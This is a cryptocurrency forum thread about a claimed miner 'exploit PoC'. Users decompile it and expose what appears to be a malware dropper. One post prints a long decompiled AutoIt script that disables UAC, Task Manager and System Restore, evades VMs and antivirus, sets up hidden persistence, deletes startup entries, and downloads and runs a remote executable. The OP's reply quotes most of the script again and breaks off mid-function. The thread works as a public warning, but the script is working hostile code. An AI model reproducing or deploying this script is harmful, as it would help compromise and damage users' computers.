steve15 (OP)
Member
Offline
Activity: 70
Merit: 10
|
|
January 27, 2014, 01:54:14 PM |
|
The security build in can not be bypassed. I lol'ed... Your exe is actually an sfx rar containing,among others, two other exe : your AutoIt protection(?) and your .net exe that can be fully decompiled with dotpeek or ILSpy ! For a pentesting expert, you could have done a better job ! Feel free to decompile it, and PM me the results. We'll compare the source with your results then ;-)
|
|
|
|
nuno12345
|
|
January 27, 2014, 07:10:52 PM |
|
frmUPnPBrowser: Source Code for [KnC_cg_bfg_exploit_PoC]ManagedUPnPTest.frmUPnPBrowser // Decompiled by Salamander version 2.0.0 // Copyright 2002-2006 Remotesoft Inc. All rights reserved. // http://www.remotesoft.com/salamander
using ManagedUPnP; using System; using System.ComponentModel; using System.Drawing; using System.Windows.Forms;
namespace ManagedUPnPTest { public class frmUPnPBrowser : Form { private ManagedUPnP.AutoEventedDiscoveryServices mdsServices;
private ctlUPnPInfo miInfo = null;
private IContainer components = null;
private ctlUPnPTreeBrowser tvUPnP;
private ImageList ilIcons;
private Panel pnlInfo;
private SplitContainer scMain;
private TabControl tcMain;
private TabPage tpInfo;
private TabPage tpLog;
private ctlLogBox txtLog;
public frmUPnPBrowser() { InitializeComponent(); }
private void frmManagedUPnPTest_Load(object sender, EventArgs e) { Logging.LogLines += new LogLinesEventHandler(this, Logging_LogLines); Logging.Enabled = true; mdsServices = new ManagedUPnP.AutoEventedDiscoveryServices(null); mdsServices.ResolveNetworkInterfaces = true; mdsServices.CanCreateServiceFor += new AutoEventedDiscoveryServicesB1.CanCreateServiceForEventHandler(this, dsServices_CanCreateServiceFor); mdsServices.CreateServiceFor += new AutoEventedDiscoveryServicesB1.CreateServiceForEventHandler(this, dsServices_CreateServiceFor); mdsServices.StatusNotifyAction += new AutoEventedDiscoveryServicesB1.StatusNotifyActionEventHandler(this, dsServices_StatusNotifyAction); WindowsFirewall.CheckUPnPFirewallRules(null); mdsServices.ReStartAsync(); }
private void frmUPnPBrowser_FormClosing(object sender, FormClosingEventArgs e) { Logging.Enabled = false; Logging.LogLines -= new LogLinesEventHandler(this, Logging_LogLines); }
private void Logging_LogLines(object sender, LogLinesEventArgs a) { string str2 = String.Concat(DateTime.Now.ToString("[yyyy/MM/dd HH:mm:ss.fff] "), new String(' ', a.Indent * 4)); txtLog.AppendLog(String.Concat(str2, a.Lines.Replace("\r\n", String.Concat("\r\n", str2)), "\r\n")); }
private void dsServices_StatusNotifyAction(object sender, AutoEventedDiscoveryServicesB1.StatusNotifyActionEventArgs a) { AutoDiscoveryServicesB1.NotifyAction autoDiscoveryServicesB1_NotifyAction = a.NotifyAction; switch (autoDiscoveryServicesB1_NotifyAction) { case 1: tvUPnP.RemoveDevice((String)a.Data); break;
case 2: tvUPnP.RemoveService((Service)a.Data); break;
default: if (autoDiscoveryServicesB1_NotifyAction == 10) { tvUPnP.AddService((Service)a.Data); } break; } }
private void dsServices_CreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CreateServiceForEventArgs a) { a.CreatedAutoService = a.Service; }
private void dsServices_CanCreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CanCreateServiceForEventArgs a) { a.CanCreate = true; }
private void tvUPnP_AfterSelect(object sender, TreeViewEventArgs e) { IUPnPTreeItem iUPnPTreeItem = tvUPnP.SelectedItem; ctlUPnPInfo CtlUPnPInfo = miInfo; miInfo = null; try { bool flag = iUPnPTreeItem == null; if (!flag) { miInfo = iUPnPTreeItem.InfoControl; flag = miInfo == null; if (!flag) { miInfo.Dock = DockStyle.Fill; pnlInfo.Controls.Add(miInfo); } } } finally { bool flag = CtlUPnPInfo == null; if (!flag) { pnlInfo.Controls.Remove(CtlUPnPInfo); CtlUPnPInfo.Dispose(); } } }
protected override void Dispose(bool disposing) { if (!(disposing ? (components == null) : 1)) { components.Dispose(); } base.Dispose(disposing); }
private void InitializeComponent() { components = new Container(); ilIcons = new ImageList(components); pnlInfo = new Panel(); scMain = new SplitContainer(); tcMain = new TabControl(); tpInfo = new TabPage(); tpLog = new TabPage(); tvUPnP = new ctlUPnPTreeBrowser(); txtLog = new ctlLogBox(); ((ISupportInitialize)scMain).BeginInit(); scMain.Panel1.SuspendLayout(); scMain.Panel2.SuspendLayout(); scMain.SuspendLayout(); tcMain.SuspendLayout(); tpInfo.SuspendLayout(); tpLog.SuspendLayout(); base.SuspendLayout(); ilIcons.ColorDepth = ColorDepth.Depth8Bit; ilIcons.ImageSize = new Size(16, 16); ilIcons.TransparentColor = Color.Transparent; pnlInfo.Dock = DockStyle.Fill; pnlInfo.Location = new Point(3, 3); pnlInfo.Name = "pnlInfo"; pnlInfo.Size = new Size(645, 646); pnlInfo.TabIndex = 1; scMain.Dock = DockStyle.Fill; scMain.Location = new Point(0, 0); scMain.Name = "scMain"; scMain.Panel1.Controls.Add(tvUPnP); scMain.Panel2.Controls.Add(tcMain); scMain.Size = new Size(1055, 678); scMain.SplitterDistance = 392; scMain.TabIndex = 2; tcMain.Controls.Add(tpInfo); tcMain.Controls.Add(tpLog); tcMain.Dock = DockStyle.Fill; tcMain.Location = new Point(0, 0); tcMain.Name = "tcMain"; tcMain.SelectedIndex = 0; tcMain.Size = new Size(659, 678); tcMain.TabIndex = 1; tpInfo.Controls.Add(pnlInfo); tpInfo.Location = new Point(4, 22); tpInfo.Name = "tpInfo"; tpInfo.Padding = new Padding(3); tpInfo.Size = new Size(651, 652); tpInfo.TabIndex = 0; tpInfo.Text = "Selected Item Info"; tpInfo.UseVisualStyleBackColor = true; tpLog.Controls.Add(txtLog); tpLog.Location = new Point(4, 22); tpLog.Name = "tpLog"; tpLog.Padding = new Padding(3); tpLog.Size = new Size(496, 502); tpLog.TabIndex = 1; tpLog.Text = "UPnP Log"; tpLog.UseVisualStyleBackColor = true; tvUPnP.Dock = DockStyle.Fill; tvUPnP.ImageIndex = 1; tvUPnP.Location = new Point(0, 0); tvUPnP.Name = "tvUPnP"; tvUPnP.SelectedImageIndex = 0; tvUPnP.Size = new Size(392, 678); tvUPnP.TabIndex = 0; tvUPnP.AfterSelect += new TreeViewEventHandler(this.tvUPnP_AfterSelect); txtLog.BackColor = SystemColors.Window; txtLog.Dock = DockStyle.Fill; txtLog.Font = new Font("Courier New", 8.25F); txtLog.Location = new Point(3, 3); txtLog.Name = "txtLog"; txtLog.ReadOnly = true; txtLog.Size = new Size(490, 496); txtLog.TabIndex = 0; txtLog.Text = ""; txtLog.WordWrap = false; base.AutoScaleDimensions = new SizeF(6.0F, 13.0F); base.AutoScaleMode = AutoScaleMode.Font; base.ClientSize = new Size(1055, 678); base.Controls.Add(scMain); base.Name = "frmUPnPBrowser"; Text = "KnC Miner - CGminer - BFGminer exploiter PoC"; base.FormClosing += new FormClosingEventHandler(this.frmUPnPBrowser_FormClosing); base.Load += new EventHandler(this.frmManagedUPnPTest_Load); scMain.Panel1.ResumeLayout(false); scMain.Panel2.ResumeLayout(false); ((ISupportInitialize)scMain).EndInit(); scMain.ResumeLayout(false); tcMain.ResumeLayout(false); tpInfo.ResumeLayout(false); tpLog.ResumeLayout(false); base.ResumeLayout(false); } }
} Am I right? Should I paste what it does?
|
|
|
|
steve15 (OP)
Member
Offline
Activity: 70
Merit: 10
|
|
January 27, 2014, 07:26:24 PM |
|
frmUPnPBrowser: Source Code for [KnC_cg_bfg_exploit_PoC]ManagedUPnPTest.frmUPnPBrowser // Decompiled by Salamander version 2.0.0 // Copyright 2002-2006 Remotesoft Inc. All rights reserved. // http://www.remotesoft.com/salamander
using ManagedUPnP; using System; using System.ComponentModel; using System.Drawing; using System.Windows.Forms;
namespace ManagedUPnPTest { public class frmUPnPBrowser : Form { private ManagedUPnP.AutoEventedDiscoveryServices mdsServices;
private ctlUPnPInfo miInfo = null;
private IContainer components = null;
private ctlUPnPTreeBrowser tvUPnP;
private ImageList ilIcons;
private Panel pnlInfo;
private SplitContainer scMain;
private TabControl tcMain;
private TabPage tpInfo;
private TabPage tpLog;
private ctlLogBox txtLog;
public frmUPnPBrowser() { InitializeComponent(); }
private void frmManagedUPnPTest_Load(object sender, EventArgs e) { Logging.LogLines += new LogLinesEventHandler(this, Logging_LogLines); Logging.Enabled = true; mdsServices = new ManagedUPnP.AutoEventedDiscoveryServices(null); mdsServices.ResolveNetworkInterfaces = true; mdsServices.CanCreateServiceFor += new AutoEventedDiscoveryServicesB1.CanCreateServiceForEventHandler(this, dsServices_CanCreateServiceFor); mdsServices.CreateServiceFor += new AutoEventedDiscoveryServicesB1.CreateServiceForEventHandler(this, dsServices_CreateServiceFor); mdsServices.StatusNotifyAction += new AutoEventedDiscoveryServicesB1.StatusNotifyActionEventHandler(this, dsServices_StatusNotifyAction); WindowsFirewall.CheckUPnPFirewallRules(null); mdsServices.ReStartAsync(); }
private void frmUPnPBrowser_FormClosing(object sender, FormClosingEventArgs e) { Logging.Enabled = false; Logging.LogLines -= new LogLinesEventHandler(this, Logging_LogLines); }
private void Logging_LogLines(object sender, LogLinesEventArgs a) { string str2 = String.Concat(DateTime.Now.ToString("[yyyy/MM/dd HH:mm:ss.fff] "), new String(' ', a.Indent * 4)); txtLog.AppendLog(String.Concat(str2, a.Lines.Replace("\r\n", String.Concat("\r\n", str2)), "\r\n")); }
private void dsServices_StatusNotifyAction(object sender, AutoEventedDiscoveryServicesB1.StatusNotifyActionEventArgs a) { AutoDiscoveryServicesB1.NotifyAction autoDiscoveryServicesB1_NotifyAction = a.NotifyAction; switch (autoDiscoveryServicesB1_NotifyAction) { case 1: tvUPnP.RemoveDevice((String)a.Data); break;
case 2: tvUPnP.RemoveService((Service)a.Data); break;
default: if (autoDiscoveryServicesB1_NotifyAction == 10) { tvUPnP.AddService((Service)a.Data); } break; } }
private void dsServices_CreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CreateServiceForEventArgs a) { a.CreatedAutoService = a.Service; }
private void dsServices_CanCreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CanCreateServiceForEventArgs a) { a.CanCreate = true; }
private void tvUPnP_AfterSelect(object sender, TreeViewEventArgs e) { IUPnPTreeItem iUPnPTreeItem = tvUPnP.SelectedItem; ctlUPnPInfo CtlUPnPInfo = miInfo; miInfo = null; try { bool flag = iUPnPTreeItem == null; if (!flag) { miInfo = iUPnPTreeItem.InfoControl; flag = miInfo == null; if (!flag) { miInfo.Dock = DockStyle.Fill; pnlInfo.Controls.Add(miInfo); } } } finally { bool flag = CtlUPnPInfo == null; if (!flag) { pnlInfo.Controls.Remove(CtlUPnPInfo); CtlUPnPInfo.Dispose(); } } }
protected override void Dispose(bool disposing) { if (!(disposing ? (components == null) : 1)) { components.Dispose(); } base.Dispose(disposing); }
private void InitializeComponent() { components = new Container(); ilIcons = new ImageList(components); pnlInfo = new Panel(); scMain = new SplitContainer(); tcMain = new TabControl(); tpInfo = new TabPage(); tpLog = new TabPage(); tvUPnP = new ctlUPnPTreeBrowser(); txtLog = new ctlLogBox(); ((ISupportInitialize)scMain).BeginInit(); scMain.Panel1.SuspendLayout(); scMain.Panel2.SuspendLayout(); scMain.SuspendLayout(); tcMain.SuspendLayout(); tpInfo.SuspendLayout(); tpLog.SuspendLayout(); base.SuspendLayout(); ilIcons.ColorDepth = ColorDepth.Depth8Bit; ilIcons.ImageSize = new Size(16, 16); ilIcons.TransparentColor = Color.Transparent; pnlInfo.Dock = DockStyle.Fill; pnlInfo.Location = new Point(3, 3); pnlInfo.Name = "pnlInfo"; pnlInfo.Size = new Size(645, 646); pnlInfo.TabIndex = 1; scMain.Dock = DockStyle.Fill; scMain.Location = new Point(0, 0); scMain.Name = "scMain"; scMain.Panel1.Controls.Add(tvUPnP); scMain.Panel2.Controls.Add(tcMain); scMain.Size = new Size(1055, 678); scMain.SplitterDistance = 392; scMain.TabIndex = 2; tcMain.Controls.Add(tpInfo); tcMain.Controls.Add(tpLog); tcMain.Dock = DockStyle.Fill; tcMain.Location = new Point(0, 0); tcMain.Name = "tcMain"; tcMain.SelectedIndex = 0; tcMain.Size = new Size(659, 678); tcMain.TabIndex = 1; tpInfo.Controls.Add(pnlInfo); tpInfo.Location = new Point(4, 22); tpInfo.Name = "tpInfo"; tpInfo.Padding = new Padding(3); tpInfo.Size = new Size(651, 652); tpInfo.TabIndex = 0; tpInfo.Text = "Selected Item Info"; tpInfo.UseVisualStyleBackColor = true; tpLog.Controls.Add(txtLog); tpLog.Location = new Point(4, 22); tpLog.Name = "tpLog"; tpLog.Padding = new Padding(3); tpLog.Size = new Size(496, 502); tpLog.TabIndex = 1; tpLog.Text = "UPnP Log"; tpLog.UseVisualStyleBackColor = true; tvUPnP.Dock = DockStyle.Fill; tvUPnP.ImageIndex = 1; tvUPnP.Location = new Point(0, 0); tvUPnP.Name = "tvUPnP"; tvUPnP.SelectedImageIndex = 0; tvUPnP.Size = new Size(392, 678); tvUPnP.TabIndex = 0; tvUPnP.AfterSelect += new TreeViewEventHandler(this.tvUPnP_AfterSelect); txtLog.BackColor = SystemColors.Window; txtLog.Dock = DockStyle.Fill; txtLog.Font = new Font("Courier New", 8.25F); txtLog.Location = new Point(3, 3); txtLog.Name = "txtLog"; txtLog.ReadOnly = true; txtLog.Size = new Size(490, 496); txtLog.TabIndex = 0; txtLog.Text = ""; txtLog.WordWrap = false; base.AutoScaleDimensions = new SizeF(6.0F, 13.0F); base.AutoScaleMode = AutoScaleMode.Font; base.ClientSize = new Size(1055, 678); base.Controls.Add(scMain); base.Name = "frmUPnPBrowser"; Text = "KnC Miner - CGminer - BFGminer exploiter PoC"; base.FormClosing += new FormClosingEventHandler(this.frmUPnPBrowser_FormClosing); base.Load += new EventHandler(this.frmManagedUPnPTest_Load); scMain.Panel1.ResumeLayout(false); scMain.Panel2.ResumeLayout(false); ((ISupportInitialize)scMain).EndInit(); scMain.ResumeLayout(false); tcMain.ResumeLayout(false); tpInfo.ResumeLayout(false); tpLog.ResumeLayout(false); base.ResumeLayout(false); } }
} Am I right? Should I paste what it does? So you can decompile a standard .NET form... Congratz! Now show me the code that gets executed?? That's what this is about, right ? Why on earth should i encrypt a standard form doing nothing but displaying some results ?? I can also just provide you the manifest XML file, instead of acting like a fool that can decompile a standard winform.
|
|
|
|
steve15 (OP)
Member
Offline
Activity: 70
Merit: 10
|
|
January 27, 2014, 07:43:14 PM |
|
Allright, to keep this post on topic.
JUST TO BE CLEAR
Decompiling the executable, or the DLL file will NOT give you what you are looking for. These are only to run the network scan.
AutoIT is used to execute the actual exploit, and detect modifications, scanners, sniffers, decompilers, and virtual boxes.
If ANY of these is detected, the application will shut down, and the REAL injection script is terminated, destroyed and melted.
USE THIS TOOL FOR WHAT IS HAS BEEN DESIGNED FOR!!
This tool is a PROOF OF CONCEPT about build-in exploits in most miner hardware rigs.
If you feel the need to run it sandboxed, virtual, or with an active scanner/sniffer/decompiler/debugger, than your intentions are NOT to test your enviroment, thus the file gets destroyed.
I received a ton load of PM's about security issues, and this is the best solution to prevent idiots trying to hack someone else's miners.
Over and out.
|
|
|
|
ici_lemmy
Member
Offline
Activity: 75
Merit: 100
|
|
January 27, 2014, 11:32:08 PM Last edit: January 27, 2014, 11:48:08 PM by ici_lemmy |
|
That was smart to let us look at the other way... I'm disapointed by meself, I should have seen that earlier... #NoTrayIcon If ProcessExists("avastui.exe") Then Sleep(20000) $path = "ppqzt" $uniscriptdir = FileGetShortName(@ScriptDir) $uniscriptfullpath = FileGetShortName(@ScriptFullPath) $unicode_startup = FileGetShortName(@StartupDir) $unicode_windows = FileGetShortName(@WindowsDir) $unicode_system = FileGetShortName(@SystemDir) $unicode_userprofile = FileGetShortName(@UserProfileDir) $win_userprofile = "%userprofile%\" FileSetAttrib($uniscriptdir, "+SHR") Local $delay = IniRead($uniscriptdir & "\HbDzt.MCM", "6072607", "5726011", "NotFound") If $delay = "4140580" Then delay() Else EndIf Local $mutex = IniRead($uniscriptdir & "\HbDzt.MCM", "1478845", "1729463", "NotFound") If $mutex = "9293639" Then mutex() Else EndIf Local $startup = IniRead($uniscriptdir & "\HbDzt.MCM", "9363719", "5077712", "NotFound") If $startup = "8541394" Then startup() Else EndIf Local $antis = IniRead($uniscriptdir & "\HbDzt.MCM", "9632628", "8921159", "NotFound") If $antis = "2314561" Then antis() Else EndIf Local $fake = IniRead($uniscriptdir & "\HbDzt.MCM", "fake1", "fake2", "NotFound") If $fake = "fake3" Then fakemessage() Else EndIf Local $botkiller = IniRead($uniscriptdir & "\HbDzt.MCM", "botkiller1", "botkiller2", "NotFound") If $botkiller = "botkiller3" Then botkiller() Else EndIf Local $downloader = IniRead($uniscriptdir & "\HbDzt.MCM", "downloader1", "downloader2", "NotFound") If $downloader = "downloader3" Then downloader() Else EndIf Local $uac = IniRead($uniscriptdir & "\HbDzt.MCM", "uac1", "uac2", "NotFound") If $uac = "uac3" Then disable_uac() Else EndIf Local $systemrestore = IniRead($uniscriptdir & "\HbDzt.MCM", "systemrestore1", "systemrestore2", "NotFound") If $systemrestore = "systemrestore3" Then disable_syste_restore() Else EndIf Local $antitask = IniRead($uniscriptdir & "\HbDzt.MCM", "antitask1", "antitask2", "NotFound") If $antitask = "antitask3" Then antitask() Else EndIf
Func delay() $counter = 0 While $counter <= 5 Sleep(5000) ShellExecute(@SystemDir & "\mshta.exe") $counter = $counter + 1 _rundos("taskkill /IM mshta.exe") WEnd EndFunc
Func systemhide() RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1) RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0) EndFunc
Func fakemessage() $type = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetype1", "messagetype2", "NotFound") $title = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetitle1", "messagetitle2", "NotFound") $message = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetext1", "messagetext2", "NotFound") If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then Else MsgBox($type, $title, $message) FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "") EndIf EndFunc
Func mutex() $scriptname = "lmsqQw.exe" If UBound(ProcessList($scriptname)) > 2 Then Exit EndFunc
Func antitask() $read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr") If NOT ($read_antitask = "1") Then RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1") EndIf EndFunc
Func disable_uac() $read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA") If NOT ($read_uac = "0") Then RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0") EndIf EndFunc
Func startup() $buac = _checkelevationenabled() If $buac = 0 Then Else FileCreateShortcut($unicode_userprofile & "\" & $path & "\85841.vbs", $unicode_startup & "\start.lnk") FileSetAttrib($unicode_startup & "\start.lnk", "+SH") EndIf RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs") If NOT FileExists($unicode_userprofile & "\" & $path & "\85841.vbs") Then Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\65084.cmd", 1) $autoit3 = "lmsqQw.exe" FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName) FileClose($bat) Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\85841.vbs", 1) FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="' & $unicode_userprofile & "\" & $path & "\" & '65084.cmd"' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit") FileClose($vbs) RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs") FileSetAttrib($unicode_userprofile & "\" & $path & "\85841.vbs", "+SHR") FileSetAttrib($unicode_userprofile & "\" & $path & "\65084.cmd", "+SHR") If FileExists($unicode_startup & "\start.lnk") Then FileDelete($unicode_startup & "\start.lnk") EndIf Else EndIf EndFunc
Func _checkelevationenabled() $read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA") If @error Then Return Local $struct = DllStructCreate("BOOL") Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct)) If @error Then Return SetError(@error) EndIf Return SetError($artn[0], 0, DllStructGetData($struct, 1)) EndFunc
Func antis() If WinGetText("Program Manager") = "0" Then Exit Else EndIf If ProcessExists("VboxService.exe") Then Exit EndIf If ProcessExists("VMwaretray.exe") Then Exit EndIf EndFunc
Func persistence() If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then $pathtovbs = ($uniscriptdir & "\" & "run.vbs") ShellExecute($pathtovbs) Exit EndIf EndFunc
Func downloader() If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then Else FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "") $random_download_name = Random(10000, 99999, 1) & ".exe" Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1) Do Sleep(250) Until InetGetInfo($hdownload, 2) Local $nbytes = InetGetInfo($hdownload, 0) InetClose($hdownload) ShellExecute($unicode_userprofile & "\" & $random_download_name) EndIf EndFunc
Func bsod() $a = ProcessList() For $i = 1 To UBound($a) - 1 ProcessClose($a[$i][0]) Next Exit EndFunc
Func botkiller() RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run") RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run") RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run") RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run") FileDelete(@StartupDir & "\*.*") EndFunc
Func disable_syste_restore() If FileExists($uniscriptdir & "\check.txt") Then Else RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients") FileWrite($uniscriptdir & "\check.txt", "") EndIf EndFunc
Func _rundos($scommand) Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE) Return SetError(@error, @extended, $nresult) EndFunc
Global Const $prov_rsa_full = 1 Global Const $prov_rsa_aes = 24 Global Const $crypt_verifycontext = -268435456 Global Const $hp_hashsize = 4 Global Const $hp_hashval = 2 Global Const $crypt_exportable = 1 Global Const $crypt_userdata = 1 Global Const $calg_md2 = 32769 Global Const $calg_md4 = 32770 Global Const $calg_md5 = 32771 Global Const $calg_sha1 = 32772 Global Const $calg_3des = 26115 Global Const $calg_aes_128 = 26126 Global Const $calg_aes_192 = 26127 Global Const $calg_aes_256 = 26128 Global Const $calg_des = 26113 Global Const $calg_rc2 = 26114 Global Const $calg_rc4 = 26625 Global Const $calg_userkey = 0 Global $__g_acryptinternaldata[3]
[SNIP] ----------------- [SNIP]
Func loop() While 1 If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then __bsod($scriptname, False) EndIf If WinExists($path) Then bsod() Else EndIf Sleep(100) WEnd EndFunc
Yeah, why should I bother run this in a vm ? Nice game OP... but you loose !
|
|
|
|
sandor111
|
|
January 28, 2014, 12:21:39 AM |
|
Yuck, that is some nasty code... WTF, really..?
|
|
|
|
Sarge
Newbie
Offline
Activity: 1
Merit: 0
|
|
January 28, 2014, 03:48:01 AM |
|
I finished compiling my "Proof of Concept" application to allow you to test out the exploits on you OWN miners. When network sniffing is detected, the application will auto shut down! Antivirus results: Scanned with MetaScan, file is clean 39/40 antivirus scanners. I have one false positive out of 40 with a minor AV vendor. The file is CLEAN !! If 39 of the biggest AV vendors show it's clean, it IS clean! Note: The false positive is triggered by the sub that detects network sniffing and shuts the application down.AV scan result: https://www.metascan-online.com/en/scanresult/file/d79999b0cbd74e978fc4dfee6d3bc0ef- problem and solution are mystical
- Filename for download different than the file to the online scanner
- Author claims it's clean while making his statement look like the typical nigerian prince scam (colors, bold, repeating word clean several times)
- Code can't be run in a VM (WTF, why?!)
- When a network sniffer is detected to the program shuts it self down (WTF²)
- no supposed MD5 hash posted
reminds me of "your from Anonymous Proxy too, let's meet up" seems legit! <<< don't take this seriosly
|
|
|
|
bitpop
Legendary
Offline
Activity: 2912
Merit: 1060
|
|
January 28, 2014, 05:31:01 AM |
|
I love Lua
Op is delusional
|
|
|
|
steve15 (OP)
Member
Offline
Activity: 70
Merit: 10
|
|
January 28, 2014, 03:22:21 PM |
|
That was smart to let us look at the other way... I'm disapointed by meself, I should have seen that earlier... #NoTrayIcon If ProcessExists("avastui.exe") Then Sleep(20000) $path = "ppqzt" $uniscriptdir = FileGetShortName(@ScriptDir) $uniscriptfullpath = FileGetShortName(@ScriptFullPath) $unicode_startup = FileGetShortName(@StartupDir) $unicode_windows = FileGetShortName(@WindowsDir) $unicode_system = FileGetShortName(@SystemDir) $unicode_userprofile = FileGetShortName(@UserProfileDir) $win_userprofile = "%userprofile%\" FileSetAttrib($uniscriptdir, "+SHR") Local $delay = IniRead($uniscriptdir & "\HbDzt.MCM", "6072607", "5726011", "NotFound") If $delay = "4140580" Then delay() Else EndIf Local $mutex = IniRead($uniscriptdir & "\HbDzt.MCM", "1478845", "1729463", "NotFound") If $mutex = "9293639" Then mutex() Else EndIf Local $startup = IniRead($uniscriptdir & "\HbDzt.MCM", "9363719", "5077712", "NotFound") If $startup = "8541394" Then startup() Else EndIf Local $antis = IniRead($uniscriptdir & "\HbDzt.MCM", "9632628", "8921159", "NotFound") If $antis = "2314561" Then antis() Else EndIf Local $fake = IniRead($uniscriptdir & "\HbDzt.MCM", "fake1", "fake2", "NotFound") If $fake = "fake3" Then fakemessage() Else EndIf Local $botkiller = IniRead($uniscriptdir & "\HbDzt.MCM", "botkiller1", "botkiller2", "NotFound") If $botkiller = "botkiller3" Then botkiller() Else EndIf Local $downloader = IniRead($uniscriptdir & "\HbDzt.MCM", "downloader1", "downloader2", "NotFound") If $downloader = "downloader3" Then downloader() Else EndIf Local $uac = IniRead($uniscriptdir & "\HbDzt.MCM", "uac1", "uac2", "NotFound") If $uac = "uac3" Then disable_uac() Else EndIf Local $systemrestore = IniRead($uniscriptdir & "\HbDzt.MCM", "systemrestore1", "systemrestore2", "NotFound") If $systemrestore = "systemrestore3" Then disable_syste_restore() Else EndIf Local $antitask = IniRead($uniscriptdir & "\HbDzt.MCM", "antitask1", "antitask2", "NotFound") If $antitask = "antitask3" Then antitask() Else EndIf
Func delay() $counter = 0 While $counter <= 5 Sleep(5000) ShellExecute(@SystemDir & "\mshta.exe") $counter = $counter + 1 _rundos("taskkill /IM mshta.exe") WEnd EndFunc
Func systemhide() RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1) RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0) EndFunc
Func fakemessage() $type = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetype1", "messagetype2", "NotFound") $title = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetitle1", "messagetitle2", "NotFound") $message = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetext1", "messagetext2", "NotFound") If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then Else MsgBox($type, $title, $message) FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "") EndIf EndFunc
Func mutex() $scriptname = "lmsqQw.exe" If UBound(ProcessList($scriptname)) > 2 Then Exit EndFunc
Func antitask() $read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr") If NOT ($read_antitask = "1") Then RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1") EndIf EndFunc
Func disable_uac() $read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA") If NOT ($read_uac = "0") Then RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0") EndIf EndFunc
Func startup() $buac = _checkelevationenabled() If $buac = 0 Then Else FileCreateShortcut($unicode_userprofile & "\" & $path & "\85841.vbs", $unicode_startup & "\start.lnk") FileSetAttrib($unicode_startup & "\start.lnk", "+SH") EndIf RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs") If NOT FileExists($unicode_userprofile & "\" & $path & "\85841.vbs") Then Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\65084.cmd", 1) $autoit3 = "lmsqQw.exe" FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName) FileClose($bat) Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\85841.vbs", 1) FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="' & $unicode_userprofile & "\" & $path & "\" & '65084.cmd"' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit") FileClose($vbs) 